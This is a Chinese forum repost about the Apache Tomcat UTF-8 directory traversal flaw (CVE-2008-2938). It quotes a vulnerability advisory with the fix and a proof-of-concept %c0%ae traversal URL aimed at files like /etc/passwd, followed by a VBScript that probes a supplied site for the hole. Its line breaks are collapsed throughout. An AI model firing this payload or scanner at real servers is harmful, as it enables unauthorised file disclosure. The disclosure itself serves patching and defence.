Apache Tomcat UTF-8编码漏洞[转载至邪恶八进制]
Apache Tomcat出了一个类似当年IIS url 编码的漏洞。漏洞发生在Apache Tomcat处理UTF-8编码时,没有正确转换,从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式,使得可以遍历系统任意文件,包括/etc/passwd等
触发的条件为Apache Tomcat的配置文件context.xml 或 server.xml 的'allowLinking' 和 'URIencoding' 允许'UTF-8'选项
Title: Apache Tomcat Directory Traversal VulnerabilityAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)Severity: HighImpact: Remote File DisclosureVulnerable Version: prior to 6.0.18Solution:- Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)- Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.- Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.References:- http://tomcat.apache.org/security.html- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938History:- 07.17.2008: Initiate notify (To Apache Security Team)- 08.02.2008: Responsed this problem fixed and released new version- 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)- 08.10.2008: Responsed with some suggestions.DescriptionAs Apache Security Team, this problem occurs because of JAVA side.If your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as'UTF-8', an attacker can obtain your important system files.(e.g./etc/passwd)ExploitIf your webroot directory has three depth(e.g /usr/local/wwwroot), Anattacker can access arbitrary files as below. (Proof-of-concept)http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar# milw0rm.com
VBS 测试版:
Dim strUrl,strSiteshowB()Set Args = Wscript.ArgumentsIf Args.Count <> 1 ThenShowU()ElsestrSite=Args(0)End IfstrUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"Set objXML = CreateObject("Microsoft.XMLHTTP")objXML.Open "GET",strSite & strUrl, FalseobjXML.SetRequestHeader "Referer", strSiteobjXML.send()if objXML.status=200 thenwscript.echo("存在漏洞")end ifSub showB()With Wscript.Echo("+--------------------------=====================------------------------------+").Echo("Exploit Apache Tomcat UTF-8").Echo("Code By Safe3").Echo("+--------------------------=====================------------------------------+")End withEnd SubSub showU()With Wscript.Echo("+--------------------------=====================------------------------------+").Echo("用法:").Echo(" cscript "&.ScriptName&" site").Echo("例子:").Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt").Echo("+--------------------------=====================------------------------------+").QuitEnd withEnd Sub
页:
[1]